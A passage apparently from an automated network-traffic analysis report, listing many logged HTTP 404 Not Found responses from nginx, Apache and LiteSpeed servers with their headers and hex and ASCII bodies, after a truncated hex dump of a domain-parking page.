3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Oct 2024 15:54:52 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 29 Oct 2024 15:54:55 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 29 Oct 2024 15:54:57 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Tue, 29 Oct 2024 15:55:00 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 29 Oct 2024 15:55:06 GMT
                Server: Apache/2.4.62 (Unix)
                Content-Length: 196
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 29 Oct 2024 15:55:09 GMT
                Server: Apache/2.4.62 (Unix)
                Content-Length: 196
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 29 Oct 2024 15:55:09 GMT
                Server: Apache/2.4.62 (Unix)
                Content-Length: 196
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 29 Oct 2024 15:55:09 GMT
                Server: Apache/2.4.62 (Unix)
                Content-Length: 196
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 29 Oct 2024 15:55:09 GMT
                Server: Apache/2.4.62 (Unix)
                Content-Length: 196
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 29 Oct 2024 15:55:11 GMT
                Server: Apache/2.4.62 (Unix)
                Content-Length: 196
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 29 Oct 2024 15:55:14 GMT
                Server: Apache/2.4.62 (Unix)
                Content-Length: 196
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 1251
                date: Tue, 29 Oct 2024 15:55:49 GMT
                server: LiteSpeed
                vary: User-Agent
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 1251
                date: Tue, 29 Oct 2024 15:55:52 GMT
                server: LiteSpeed
                vary: User-Agent
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 1251
                date: Tue, 29 Oct 2024 15:55:54 GMT
                server: LiteSpeed
                vary: User-Agent
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                pragma: no-cache
                content-type: text/html
                content-length: 1251
                date: Tue, 29 Oct 2024 15:55:57 GMT
                server: LiteSpeed
                vary: User-Agent
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 29 Oct 2024 15:56:03 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 29 Oct 2024 15:56:05 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 29 Oct 2024 15:56:08 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 29 Oct 2024 15:56:08 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 29 Oct 2024 15:56:10 GMT
                Server: Apache
                Content-Length: 203
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 29 Oct 2024 15:56:17 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 29 Oct 2024 15:56:19 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 29 Oct 2024 15:56:22 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Tue, 29 Oct 2024 15:56:24 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Oct 2024 15:56:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Oct 2024 15:56:33 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Oct 2024 15:56:37 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Oct 2024 15:56:39 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 15:56:45 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
